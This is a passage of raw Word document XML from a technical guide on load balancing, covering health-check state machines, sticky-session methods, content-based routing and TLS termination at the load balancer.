          <w:bCs/>
        </w:rPr>
        <w:t>complete outage</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>. This is why </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PodDisruptionBudgets</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> in Kubernetes set minimum available pod counts — the system refuses to remove more pods from service than the budget allows, even if they're failing probes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E9F998" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Health Check State Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531922CB" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Each backend in the load balancer maintains a state machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0658B924" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C34311" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>States: HEALTHY, UNHEALTHY, DEGRADED (some LBs add this intermediate state)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F0A45E" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9"/>
    <w:p w14:paraId="27DE5EAD" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Transitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E2D2FD" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  HEALTHY    → UNHEALTHY:  N consecutive failures (e.g., 3 failures in 15 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C4F9F8" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  UNHEALTHY  → HEALTHY:    M consecutive successes (e.g., 2 successes in 10 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB67291" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  HEALTHY    → DEGRADED:   Response time &gt; threshold but request not failing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0555E57E" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  DEGRADED   → UNHEALTHY:  Continues degrading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B51CAD2" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  DEGRADED   → HEALTHY:    Response time returns to normal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDEAF09" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hysteresis in state transitions:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> The different thresholds for failure (3 consecutive) vs recovery (2 consecutive) create </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hysteresis</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> — the system resists oscillation. A backend must demonstrate consistent failure before being removed, and consistent recovery before being added back. Without hysteresis, a backend that intermittently passes/fails health checks would be constantly added and removed from the pool — </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flapping</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> — causing connection churn and instability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EDB074" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The unhealthy fraction problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> If many backends simultaneously fail health checks (e.g., a bad deployment causes all instances to start failing), removing all of them from the pool creates a complete outage. Some load balancers implement </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>panic mode</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>: if the healthy backend count drops below X% of the pool, stop removing backends even if they're failing health checks. A degraded system serving some requests is better than no system at all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61973738" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:pict w14:anchorId="5D2EEC9F">
          <v:rect id="_x0000_i2536" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="012E3A76" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Session Persistence (Sticky Sessions) — The Trade-offs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65856F8C" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Session persistence routes requests from the same client to the same backend. Necessary when backends maintain </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>client-specific state</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> (in-memory sessions, local caches, stateful computations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B152DEB" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cookie-Based Stickiness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068F706F" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D9008E" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="254"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:lastRenderedPageBreak/>
        <w:t>On the first request from a client, the LB selects a backend (using its normal algorithm).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF72432" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="254"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>The LB inserts a </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> in the response (Set-Cookie: LB_SESSION=backend_id_hash; Path=/; HttpOnly).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26347F7D" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="254"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>On subsequent requests, the browser sends the cookie automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470B927C" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="254"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>The LB reads the cookie, extracts the backend identifier, and routes to that backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FF821B" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The cookie value:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Never expose the backend's actual IP or hostname — that leaks infrastructure information. Instead, use a </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hash or token</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> that the LB can map to a backend identity. Optionally encrypt the cookie value to prevent client manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622EFE3A" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What happens when the sticky backend fails:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> The cookie still points to the dead backend. The LB detects it's unhealthy, falls back to the normal load balancing algorithm to pick a new backend, and updates the cookie. The client loses its session state (it's gone with the dead backend). This is the fundamental weakness of server-side session state — backend failures cause session loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDBEEA8" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The solution:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Push session state to an external store (Redis, database). All backends share the session store — any backend can serve any client. Stickiness becomes unnecessary. Sessions survive backend failures. This is why stateless architecture is the goal for horizontally scalable systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735F78F9" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IP Hash Stickiness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B0CF69" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Hash the client's IP address to select a backend: backend = hash(client_ip) % num_backends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A11B8CD" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Problems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EB5927" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="255"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Clients behind </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NAT or corporate proxies</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> all share one public IP — they all hash to the same backend, creating a hotspot. One backend receives all traffic from an entire office building.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C80E5A" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="255"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IPv6 clients</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> have long, often randomly generated addresses — may distribute differently than expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDB5CBA" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="255"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Adding or removing a backend changes N in the modulo — most clients remap to different backends (use consistent hashing to avoid this).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268110BB" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="255"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Client IP </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>changes</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> (mobile users switching networks, VPN reconnections) — the client effectively loses its sticky session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406BA283" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:lastRenderedPageBreak/>
        <w:t>IP hash is simple but brittle. Cookie-based stickiness is more reliable because it's application-controlled, survives IP changes, and doesn't suffer from NAT hotspots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C46477D" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>URL/Parameter-Based Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3186B0" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Route based on URL path or query parameter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A08E695" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62829108" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>/api/users/*     → User Service cluster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4602D4DF" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>/api/products/*  → Product Service cluster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AD373D" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>/api/checkout/*  → Checkout Service cluster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112D2343" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>This is </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> stickiness in the traditional sense — it's </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>content-based routing</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>. Requests for different resources go to different backend clusters. This is how microservices are exposed through a single ingress — one external domain, multiple internal services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAE7DCF" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Header-based routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401D3814" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFD34DA" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>X-API-Version: v2  →  Backend cluster running v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE16403" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>X-API-Version: v1  →  Backend cluster running v1 (legacy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C6B89C" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Used for </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>canary deployments</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> — route a percentage of traffic to the new version:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A4F358" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D18330F" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>X-Canary: true  (set for 5% of users)  → Canary backend cluster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246BBA37" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>(default)                               → Stable backend cluster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D39BE2" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:pict w14:anchorId="6C386973">
          <v:rect id="_x0000_i2537" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78100703" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. SSL Termination — TLS at the Load Balancer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E9FD19" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why Terminate TLS at the LB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409F5710" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Centralized certificate management:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> One place to update certificates (no more updating each backend individually). Automated renewal via Let's Encrypt, AWS ACM, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDBD662" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reduced backend CPU load:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> TLS handshake and record encryption/decryption are CPU-intensive (though hardware acceleration via AES-NI makes modern TLS fast). Terminating at the LB keeps backends free for application logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBC31B5" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Enables L7 routing:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> The LB can only inspect HTTP headers and make content-based routing decisions if it decrypts the traffic. Encrypted traffic can only be L4 load balanced (pass-through) — the LB sees only the destination IP/port, not the application content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCBF139" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/2 and HTTPS:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Most clients only use HTTP/2 over TLS (h2). Terminating TLS at the LB allows the LB to speak HTTP/2 with clients and HTTP/1.1 with backends (or HTTP/2 if supported) — protocol translation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F21D4F" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS Termination Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5B0E14" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS 1.3 handshake at the LB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2237FFD1" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>TLS 1.3 reduces the handshake to </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1-RTT</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> (or 0-RTT for resumed sessions):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595DB3A4" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ClientHello:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Client sends its supported cipher suites, key share (Diffie-Hellman public key), SNI (Server Name Indication — the hostname the client is connecting to).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC175B0" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ServerHello + EncryptedExtensions + Certificate + CertificateVerify + Finished:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Server responds with chosen cipher suite, its own key share, certificate, and proof of private key ownership. All in one flight.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACCDC58" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client Finished:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Client verifies the certificate, derives the shared secret (from Diffie-Hellman key exchange), confirms session establishment.</w:t>
      </w:r>
    </w:p>
